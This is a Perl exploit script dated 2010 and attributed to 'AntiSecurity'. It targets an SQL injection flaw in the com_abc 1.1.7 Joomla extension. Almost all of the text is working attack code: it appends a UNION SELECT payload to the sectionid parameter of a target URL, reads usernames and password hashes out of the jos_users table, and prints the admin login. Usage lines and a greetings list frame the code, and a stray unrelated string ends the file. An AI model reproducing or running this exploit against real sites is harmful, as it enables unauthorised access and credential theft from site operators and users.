#!/usr/bin/perl #***********************************************************************# # # # [o] ABC Joomla Extension SQL Injection Exploit# #Software : com_abc version 1.1.7 # #Vendor : http://www.airiny.com/# #Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] # #Contact: public[at]antisecurity[dot]org# #Home : http://antisecurity.org/# # # # [o] Usage # #root@evilc0de:~# perl abc.pl www.target.com# # # # [o] Greetz# #Angela Zhang stardustmemory aJe martfella pizzyroot Genex# #H312Y yooogy mousekill }^-^{ noname matthews wishnusakti # #skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 # # # # [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia # # # #***********************************************************************# use HTTP::Request; use LWP::UserAgent; my $target = $ARGV[0]; my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS§ionid='; my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--'; print "\n[x]===============================================[x]\n"; print "[x]ABC Joomla Extension SQL Injection Exploit [x]\n"; print "[x][C]oded By AntiSecurity[x]\n"; print "[x]===============================================[x]\n\n"; my $exploit = "http://".$target.$file_vuln.$sql_query; my $request = HTTP::Request->new(GET=>$exploit); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response= $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/:(.*):(.*):/g) { my ($username,$password) = ($1,$2); print "[+] $username:$password \n\n"; } else { print "[-] Error, Fail to get admin login.\n\n"; } } else { print "[-] Error, ".$response->status_line."\n\n"; }
体验盒子